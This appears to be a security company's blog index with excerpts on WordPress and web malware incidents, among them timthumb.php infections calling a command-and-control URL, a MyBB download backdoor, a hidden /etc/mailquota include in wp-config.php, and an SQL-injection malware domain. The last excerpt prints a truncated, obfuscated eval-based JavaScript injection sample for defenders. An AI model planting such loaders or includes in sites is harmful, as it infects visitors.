Timthumb.php Mass Infection – Aftermath – Part I

If you use WordPress you’re probably aware of the mass infection caused by a vulnerability in the timthumb.php script, a photo manipulation script included in many themes and plugins.

Sites were compromised with anything from malware to Blackhat SEO spam, to .htaccess redirections.

It would be useful to gain metrics based on the amount of sites that were truly affected, the problem is that it’s very hard to estimate how many sites were in fact compromised. 1 thousand, 100 thousand, 1 million? Who knows for sure.

We found a way to get close to the actual numbers. For the last couple of months most of the sites compromised had their wp-settings.php modified with a function to contact the URL http://91.196.216.30/bt.php for more information on what to do with the site (display malware, spam, etc). Yes, kinda like a command and control site.

Read More

MyBB web site and downloads compromised

It’s not good when your site gets infected with malware, specially if you’re a provider of software to many. If you are using MyBB (forum software), please be aware that their web site hacked and the software download packages compromised:

There was unfortunately a vulnerability in the CMS which powers the MyBB home page and downloads system. Using this vulnerability a hacker was able to add a backdoor to one of the files, allowing them to execute arbitrary PHP and manipulate the release packages. The CMS was custom written a number of years ago, however we believe a 3rd party framework used by the CMS contributed to the vulnerability. The CMS shares no code with MyBB so there should be no concern that these events indicate a vulnerability in MyBB. The server is also configured to isolate the subdomains belonging to the MyBB website, so it is unlikely that any data from the community forums or other sections of the site was compromised.

The MyBB team recommend these actions:

  1. Download the latest release of MyBB.
  2. Replace ./index.php (in the root folder of your forum) with the one in the download (./Upload/index.php).
  3. Remove the ./install/ folder

*We are trying to find more information about the backdoor that was added, but no luck yet. If you find a link with the affected version, let us know.

Remove Unused/Testing/Debug Software From Your Site

We constantly see sites hacked due to vulnerabilities in various tools. In most cases, site owners don’t even realize they are there, or don’t even remember they were installed.

Higher Risk for Issues

For example, a site owner/manager has to make a quick modification in the database and installs phpMyAdmin, a few months (or even years) later their site gets hacked through a vulnerability discovered in phpMyAdmin.

Read More

Evil backdoors – Part II

A few months ago we did a post about backdoors, explaining how they work and how to look for them. If you didn’t read it, take a read here:

ASK Sucuri: What about the backdoors?

However, we still see on online forums people recommending to search for “eval ( base64_decode” and things like that when searching for backdoors. If you review our examples in that article, you can see that it would miss a few of them.

Today we started to see another type of backdoor that most signature-based tools can’t find. Take a look:

Read More

Mass infections from jjghui.com/urchin.js (SQL injection)

We are seeing many sites compromised with malware from jjghui.com/urchin.js. Most of them are IIS/ASP sites and the infection method seems to be similar to the Lizamoon mass infections from a few months ago (SQL injection).

According to Google, almost 1.5k sites have been blacklisted already due to it, and there are 80k+ pages on Google index with a JavaScript malware pointing to it.

What is interesting is that the registration information for this domain is the same as the one used on the earlier Lizamoon domains:

Read More

Malware on /etc/mailquota

We are seeing an interesting trend lately. A site gets compromised and starts to distribute malware to its users. The webmaster (owner of the site) searches everywhere for malicious strings, and can’t find anything. Where can it be hidden?

It could be outside the root directory of your site. On many sites we’ve been analyzing over the last few days, they’ve been adding the following code in wp-config.php (yes, WordPress sites on shared hosts):

require( ABSPATH . “/../etc/mailquota”);


Read More

Malware Infections from rebotstat dot com

We are starting to share some of our research and view of web-based malware online: http://sucuri.net/global. The #1 infection we are seeing in the last few days is caused by a heavily encoded piece of javascript malware:

<!– o –><script>b=new function()
{return 2;};if(!+b)String&#46prototype&#46vqwfbeweb=’h’+’arC';for(i 
in $=’b4h3tbn’)
if(i==’vqwfbeweb’)m=$[i];try{new Object()&#46wehweh();}catch(q)
{ss="";}try{window['e'+'v'+'al'](‘asdas’)}catch(q)
{s=String["fr"+"omC"+m+"od"+'e'];}d=new Date();d2=new Date(d&#46valueOf()-2);Object&#46prototype&#46asd=’e';if({}&#46asd===’e’)a=document["c"+"r"+"e"+"a"+"
t"+"e"+"T"+"e"+"x"+"t"+"N"+"o"+"d"+"e"](‘321′);if(a&#46data==321)x=-1*(d-
d2);n=[-x+7,-x+7,-x+103,-x+100,-x+30,-x+38,-x+98,-x+109,-x+97,-x+115,
-x+107,-x+99,-x+108,-x+114,-x+44,-x+101,-x+99,-x+114,-x+67,-x+106,-x+99,
-x+107,-x+99,..
for(i=0;i<n&#46length;i++)ss +=s(e val("n"+"[i"+"]"));
if(!+b) e val(ss);</script><!– c –>


Read More